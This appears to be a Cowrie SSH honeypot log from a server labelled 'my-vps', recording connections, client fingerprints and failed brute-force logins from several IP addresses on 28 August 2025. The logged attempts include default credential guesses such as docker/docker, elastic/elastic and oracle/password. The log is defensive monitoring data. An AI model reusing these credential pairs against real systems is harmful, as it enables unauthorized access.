{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:43:00.574605Z","src_ip":"120.46.163.82","session":"1618d046a340"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T06:43:00.797707Z","src_ip":"120.46.163.82","session":"1618d046a340"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:43:00.799309Z","src_ip":"120.46.163.82","session":"1618d046a340"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":51348,"dst_ip":"1.2.3.4","dst_port":22,"session":"7289079e4b00","protocol":"ssh","message":"New connection: 193.32.162.145:51348 (1.2.3.4:22) [session: 7289079e4b00]","sensor":"my-vps","timestamp":"2025-08-28T06:43:04.927374Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:43:04.928392Z","src_ip":"193.32.162.145","session":"7289079e4b00"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T06:43:04.959028Z","src_ip":"193.32.162.145","session":"7289079e4b00"}
{"eventid":"cowrie.login.failed","username":"sol","password":"sol","message":"login attempt [sol/sol] failed","sensor":"my-vps","timestamp":"2025-08-28T06:43:05.051342Z","src_ip":"193.32.162.145","session":"7289079e4b00"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:43:06.083812Z","src_ip":"193.32.162.145","session":"7289079e4b00"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37930,"dst_ip":"1.2.3.4","dst_port":22,"session":"07dbefe7c31a","protocol":"ssh","message":"New connection: 212.227.125.160:37930 (1.2.3.4:22) [session: 07dbefe7c31a]","sensor":"my-vps","timestamp":"2025-08-28T06:43:06.782162Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:43:06.786371Z","src_ip":"212.227.125.160","session":"07dbefe7c31a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:43:06.998023Z","src_ip":"212.227.125.160","session":"07dbefe7c31a"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker","message":"login attempt [docker/docker] failed","sensor":"my-vps","timestamp":"2025-08-28T06:43:07.862791Z","src_ip":"212.227.125.160","session":"07dbefe7c31a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:43:09.080821Z","src_ip":"212.227.125.160","session":"07dbefe7c31a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46356,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba9d2fb38e45","protocol":"ssh","message":"New connection: 212.227.235.229:46356 (1.2.3.4:22) [session: ba9d2fb38e45]","sensor":"my-vps","timestamp":"2025-08-28T06:43:13.235917Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:43:13.236741Z","src_ip":"212.227.235.229","session":"ba9d2fb38e45"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:43:13.490200Z","src_ip":"212.227.235.229","session":"ba9d2fb38e45"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker","message":"login attempt [docker/docker] failed","sensor":"my-vps","timestamp":"2025-08-28T06:43:14.267479Z","src_ip":"212.227.235.229","session":"ba9d2fb38e45"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:43:15.521892Z","src_ip":"212.227.235.229","session":"ba9d2fb38e45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39894,"dst_ip":"1.2.3.4","dst_port":22,"session":"68e43d3c98a7","protocol":"ssh","message":"New connection: 212.227.125.160:39894 (1.2.3.4:22) [session: 68e43d3c98a7]","sensor":"my-vps","timestamp":"2025-08-28T06:43:23.066857Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:43:23.067986Z","src_ip":"212.227.125.160","session":"68e43d3c98a7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:43:23.286774Z","src_ip":"212.227.125.160","session":"68e43d3c98a7"}
{"eventid":"cowrie.login.failed","username":"user","password":"1","message":"login attempt [user/1] failed","sensor":"my-vps","timestamp":"2025-08-28T06:43:24.143849Z","src_ip":"212.227.125.160","session":"68e43d3c98a7"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:43:25.360615Z","src_ip":"212.227.125.160","session":"68e43d3c98a7"}
{"eventid":"cowrie.session.closed","duration":31.03500986099243,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:43:27.157768Z","src_ip":"8.222.212.69","session":"0fe31620a4b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59610,"dst_ip":"1.2.3.4","dst_port":22,"session":"488785d0109a","protocol":"ssh","message":"New connection: 212.227.235.229:59610 (1.2.3.4:22) [session: 488785d0109a]","sensor":"my-vps","timestamp":"2025-08-28T06:43:29.829801Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:43:29.831017Z","src_ip":"212.227.235.229","session":"488785d0109a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:43:30.083772Z","src_ip":"212.227.235.229","session":"488785d0109a"}
{"eventid":"cowrie.login.failed","username":"user","password":"1","message":"login attempt [user/1] failed","sensor":"my-vps","timestamp":"2025-08-28T06:43:30.843889Z","src_ip":"212.227.235.229","session":"488785d0109a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:43:32.099458Z","src_ip":"212.227.235.229","session":"488785d0109a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42038,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a69047a5775","protocol":"ssh","message":"New connection: 212.227.125.160:42038 (1.2.3.4:22) [session: 7a69047a5775]","sensor":"my-vps","timestamp":"2025-08-28T06:43:39.772481Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:43:39.773506Z","src_ip":"212.227.125.160","session":"7a69047a5775"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:43:39.992190Z","src_ip":"212.227.125.160","session":"7a69047a5775"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic","message":"login attempt [elastic/elastic] failed","sensor":"my-vps","timestamp":"2025-08-28T06:43:40.650475Z","src_ip":"212.227.125.160","session":"7a69047a5775"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:43:41.871396Z","src_ip":"212.227.125.160","session":"7a69047a5775"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42222,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fdba186b4f0","protocol":"ssh","message":"New connection: 212.227.235.229:42222 (1.2.3.4:22) [session: 3fdba186b4f0]","sensor":"my-vps","timestamp":"2025-08-28T06:43:46.303508Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:43:46.304219Z","src_ip":"212.227.235.229","session":"3fdba186b4f0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:43:46.561093Z","src_ip":"212.227.235.229","session":"3fdba186b4f0"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic","message":"login attempt [elastic/elastic] failed","sensor":"my-vps","timestamp":"2025-08-28T06:43:47.333354Z","src_ip":"212.227.235.229","session":"3fdba186b4f0"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:43:48.592696Z","src_ip":"212.227.235.229","session":"3fdba186b4f0"}
{"eventid":"cowrie.session.closed","duration":120.00258898735046,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:43:49.817139Z","src_ip":"212.227.125.160","session":"7f302ebec3db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40456,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5bb3ab22ad7","protocol":"ssh","message":"New connection: 212.227.125.160:40456 (1.2.3.4:22) [session: b5bb3ab22ad7]","sensor":"my-vps","timestamp":"2025-08-28T06:43:55.926810Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:43:55.937415Z","src_ip":"212.227.125.160","session":"b5bb3ab22ad7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:43:56.190103Z","src_ip":"212.227.125.160","session":"b5bb3ab22ad7"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password","message":"login attempt [oracle/password] failed","sensor":"my-vps","timestamp":"2025-08-28T06:43:57.024076Z","src_ip":"212.227.125.160","session":"b5bb3ab22ad7"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:43:58.246120Z","src_ip":"212.227.125.160","session":"b5bb3ab22ad7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49774,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b691950c936","protocol":"ssh","message":"New connection: 212.227.235.229:49774 (1.2.3.4:22) [session: 8b691950c936]","sensor":"my-vps","timestamp":"2025-08-28T06:44:02.539939Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:44:02.541253Z","src_ip":"212.227.235.229","session":"8b691950c936"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:44:02.794161Z","src_ip":"212.227.235.229","session":"8b691950c936"}
